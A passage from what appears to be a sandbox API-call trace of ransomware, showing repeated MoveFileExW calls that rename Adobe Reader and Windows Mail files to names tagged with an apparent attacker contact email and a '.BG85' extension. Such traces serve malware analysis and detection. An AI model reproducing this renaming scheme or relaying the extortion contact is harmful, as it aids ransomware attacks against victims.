10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\[BobGreen85@criptext.com].WkPvMMMx-4XUcbPqd.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\[bobgreen85@criptext.com].wkpvmmmx-4xucbpqd.bg85"), dwFlags=0x1) returned 1 [0079.687] GetTickCount () returned 0x114bfe6 [0079.687] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20002605000) returned 1 [0079.687] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\[BobGreen85@criptext.com].shKNc4uF-MMr2C6yN.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\[bobgreen85@criptext.com].shknc4uf-mmr2c6yn.bg85"), dwFlags=0x1) returned 1 [0079.688] GetTickCount () returned 0x114bfe6 [0079.688] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20002732404) returned 1 [0079.689] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\[BobGreen85@criptext.com].qfykJBAm-0FpWdHcg.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\[bobgreen85@criptext.com].qfykjbam-0fpwdhcg.bg85"), dwFlags=0x1) returned 1 [0079.689] GetTickCount () returned 0x114bfe6 [0079.690] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20002852050) returned 1 [0079.690] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\[BobGreen85@criptext.com].tTRT31NI-gj5ziTgH.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\[bobgreen85@criptext.com].ttrt31ni-gj5zitgh.bg85"), dwFlags=0x1) returned 1 [0079.691] GetTickCount () returned 0x114bfe6 [0079.691] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20002981080) returned 1 [0079.691] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\[BobGreen85@criptext.com].SfnhVYhK-vgnlDWaL.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\[bobgreen85@criptext.com].sfnhvyhk-vgnldwal.bg85"), dwFlags=0x1) returned 1 [0079.695] GetTickCount () returned 0x114bfe6 [0079.695] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20003989011) returned 1 [0079.701] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\faces.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\[BobGreen85@criptext.com].06uoY6Kb-099bDrSk.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\[bobgreen85@criptext.com].06uoy6kb-099bdrsk.bg85"), dwFlags=0x1) returned 1 [0079.703] GetTickCount () returned 0x114bff6 [0079.703] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20004199128) returned 1 [0079.703] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\[BobGreen85@criptext.com].bZAaEd2B-HYL7DGV9.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\[bobgreen85@criptext.com].bzaaed2b-hyl7dgv9.bg85"), dwFlags=0x1) returned 1 [0079.704] GetTickCount () returned 0x114bff6 [0079.704] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20004338556) returned 1 [0079.705] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\pointers.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\[BobGreen85@criptext.com].kO1jUksP-byL9bQ8z.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\[bobgreen85@criptext.com].ko1juksp-byl9bq8z.bg85"), dwFlags=0x1) returned 1 [0079.706] GetTickCount () returned 0x114bff6 [0079.706] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20004481625) returned 1 [0079.706] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\Hanko.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\hanko.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\[BobGreen85@criptext.com].hNT8AlQq-NSERsACx.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\[bobgreen85@criptext.com].hnt8alqq-nsersacx.bg85"), dwFlags=0x1) returned 1 [0079.707] GetTickCount () returned 0x114bff6 [0079.707] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20004621327) returned 1 [0079.708] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\[BobGreen85@criptext.com].laf8pb7N-Wgzomax5.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\[bobgreen85@criptext.com].laf8pb7n-wgzomax5.bg85"), dwFlags=0x1) returned 1 [0079.709] GetTickCount () returned 0x114bff6 [0079.709] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20004771399) returned 1 [0079.709] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\[BobGreen85@criptext.com].Q84A6lr4-sY88UfSI.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\[bobgreen85@criptext.com].q84a6lr4-sy88ufsi.bg85"), dwFlags=0x1) returned 1 [0081.232] GetTickCount () returned 0x114c1ba [0081.232] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20157064118) returned 1 [0081.232] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\[BobGreen85@criptext.com].verEmkNx-71T7wVmY.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\[bobgreen85@criptext.com].veremknx-71t7wvmy.bg85"), dwFlags=0x1) returned 1 [0081.233] GetTickCount () returned 0x114c1ba [0081.233] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20157238234) returned 1 [0081.234] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), lpNewFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\[BobGreen85@criptext.com].2rxiBfP9-ZkXBZYWQ.BG85" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\[bobgreen85@criptext.com].2rxibfp9-zkxbzywq.bg85"), dwFlags=0x1) returned 1 [0081.235] GetTickCount () returned 0x114c1ba [0081.235] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20157358054) returned 1 [0081.235] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\[BobGreen85@criptext.com].AH6TSLxm-0MOq4hKS.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\[bobgreen85@criptext.com].ah6tslxm-0moq4hks.bg85"), dwFlags=0x1) returned 1 [0081.236] GetTickCount () returned 0x114c1ba [0081.236] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20157469757) returned 1 [0081.236] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\[BobGreen85@criptext.com].prXqmEQD-DH7XMcQL.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\[bobgreen85@criptext.com].prxqmeqd-dh7xmcql.bg85"), dwFlags=0x1) returned 1 [0081.733] GetTickCount () returned 0x114c3ad [0081.733] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20207172797) returned 1 [0082.031] GetTickCount () returned 0x114c4c6 [0082.032] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20237057367) returned 1 [0082.038] GetTickCount () returned 0x114c4d6 [0082.038] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20237706993) returned 1 [0086.234] GetTickCount () returned 0x114d3d3 [0086.234] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20657324513) returned 1 [0092.396] GetTickCount () returned 0x114e189 [0092.396] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21273456208) returned 1 [0092.396] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\PPKLite.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ppklite.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\[BobGreen85@criptext.com].9ixvgFnF-13vIZIB6.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\[bobgreen85@criptext.com].9ixvgfnf-13vizib6.bg85"), dwFlags=0x1) returned 1 [0092.398] GetTickCount () returned 0x114e199 [0092.398] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21273652546) returned 1 [0092.398] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeCollabSync.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobecollabsync.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\[BobGreen85@criptext.com].Vd05Czg3-mOcqGbSB.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\[bobgreen85@criptext.com].vd05czg3-mocqgbsb.bg85"), dwFlags=0x1) returned 1 [0092.399] GetTickCount () returned 0x114e199 [0092.399] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21273783401) returned 1 [0092.399] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\eBook.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\ebook.dan"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\[BobGreen85@criptext.com].zJZesIqd-fQoq2uPn.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\[bobgreen85@criptext.com].zjzesiqd-fqoq2upn.bg85"), dwFlags=0x1) returned 1 [0092.400] GetTickCount () returned 0x114e199 [0092.400] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21273882494) returned 1 [0092.400] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\ReadOutLoud.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\readoutloud.dan"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\[BobGreen85@criptext.com].tWINSexu-fCJadl4q.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\[bobgreen85@criptext.com].twinsexu-fcjadl4q.bg85"), dwFlags=0x1) returned 1 [0095.544] GetTickCount () returned 0x114e38c [0095.544] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21588268683) returned 1 [0095.544] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\updater.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\updater.dan"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\[BobGreen85@criptext.com].EvZLX5MC-q5bUK7LC.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\[bobgreen85@criptext.com].evzlx5mc-q5buk7lc.bg85"), dwFlags=0x1) returned 1 [0095.546] GetTickCount () returned 0x114e38c [0095.546] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21588455094) returned 1 [0095.546] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.esp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\[BobGreen85@criptext.com].SrMgVEbE-3dRZsjwj.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\[bobgreen85@criptext.com].srmgvebe-3drzsjwj.bg85"), dwFlags=0x1) returned 1 [0095.547] GetTickCount () returned 0x114e38c [0095.547] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21588613759) returned 1 [0095.547] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.nld"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\[BobGreen85@criptext.com].Cyj2lMgn-vhDyS8kY.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\[bobgreen85@criptext.com].cyj2lmgn-vhdys8ky.bg85"), dwFlags=0x1) returned 1 [0095.549] GetTickCount () returned 0x114e39c [0095.549] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21588826857) returned 1 [0095.550] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.suo"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\[BobGreen85@criptext.com].A3qzozzz-0tIDjveE.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\[bobgreen85@criptext.com].a3qzozzz-0tidjvee.bg85"), dwFlags=0x1) returned 1 [0095.551] GetTickCount () returned 0x114e39c [0095.551] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21588970312) returned 1 [0095.551] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.sve"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\[BobGreen85@criptext.com].CcqROqdR-GmEOf5V6.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\[bobgreen85@criptext.com].ccqroqdr-gmeof5v6.bg85"), dwFlags=0x1) returned 1 [0095.552] GetTickCount () returned 0x114e39c [0095.552] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21589117834) returned 1 [0095.552] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\services.asfx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\[BobGreen85@criptext.com].9KTSTj4F-ICMv2RhS.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\[bobgreen85@criptext.com].9ktstj4f-icmv2rhs.bg85"), dwFlags=0x1) returned 1 [0096.333] GetTickCount () returned 0x114e512 [0096.333] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21667207135) returned 1 [0096.333] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\BRdlang32.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\brdlang32.cze"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\[BobGreen85@criptext.com].FakTGsMX-SQtPKirW.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\[bobgreen85@criptext.com].faktgsmx-sqtpkirw.bg85"), dwFlags=0x1) returned 1 [0096.335] GetTickCount () returned 0x114e512 [0096.335] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21667350706) returned 1 [0096.335] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Multimedia.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\multimedia.cze"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\[BobGreen85@criptext.com].KEQfqH8A-y2Nfvic2.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\[bobgreen85@criptext.com].keqfqh8a-y2nfvic2.bg85"), dwFlags=0x1) returned 1 [0096.336] GetTickCount () returned 0x114e512 [0096.336] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21667484338) returned 1 [0096.336] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.dan"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\[BobGreen85@criptext.com].z8QsIjh9-n3TvuC3B.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\[bobgreen85@criptext.com].z8qsijh9-n3tvuc3b.bg85"), dwFlags=0x1) returned 1 [0096.337] GetTickCount () returned 0x114e512 [0096.337] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21667605221) returned 1 [0096.337] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.deu"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\[BobGreen85@criptext.com].YnPQVQPX-fkiuZV4j.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\[bobgreen85@criptext.com].ynpqvqpx-fkiuzv4j.bg85"), dwFlags=0x1) returned 1 [0096.338] GetTickCount () returned 0x114e512 [0096.338] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21667714316) returned 1 [0096.338] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DVA.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\dva.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\[BobGreen85@criptext.com].VB945b5v-9de44H2P.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\[bobgreen85@criptext.com].vb945b5v-9de44h2p.bg85"), dwFlags=0x1) returned 1 [0096.339] GetTickCount () returned 0x114e512 [0096.339] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21667832762) returned 1 [0096.340] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Eula.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\eula.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\[BobGreen85@criptext.com].5QxTTrEU-1hUrNK4f.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\[bobgreen85@criptext.com].5qxttreu-1hurnk4f.bg85"), dwFlags=0x1) returned 1 [0096.341] GetTickCount () returned 0x114e512 [0096.341] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21667963340) returned 1 [0096.341] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\DigSig.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\digsig.deu"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\[BobGreen85@criptext.com].ucLs8PyG-M2cmPB8A.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\[bobgreen85@criptext.com].ucls8pyg-m2cmpb8a.bg85"), dwFlags=0x1) returned 1 [0096.342] GetTickCount () returned 0x114e512 [0096.342] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21668096410) returned 1 [0096.342] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.jpn"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\[BobGreen85@criptext.com].QpaNmmu1-heJlbwJz.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\[bobgreen85@criptext.com].qpanmmu1-hejlbwjz.bg85"), dwFlags=0x1) returned 1 [0096.343] GetTickCount () returned 0x114e512 [0096.343] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21710067726) returned 1 [0096.762] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.kor"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\[BobGreen85@criptext.com].6DurqfQa-u2p67k1c.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\[bobgreen85@criptext.com].6durqfqa-u2p67k1c.bg85"), dwFlags=0x1) returned 1 [0097.319] GetTickCount () returned 0x114e8e9 [0097.319] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21765813360) returned 1 [0097.320] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\eula.ini"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\[BobGreen85@criptext.com].IoGnJvj2-Iu17kzFb.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\[bobgreen85@criptext.com].iognjvj2-iu17kzfb.bg85"), dwFlags=0x1) returned 1 [0097.827] GetTickCount () returned 0x114eaec [0097.827] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21816619937) returned 1 [0097.828] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 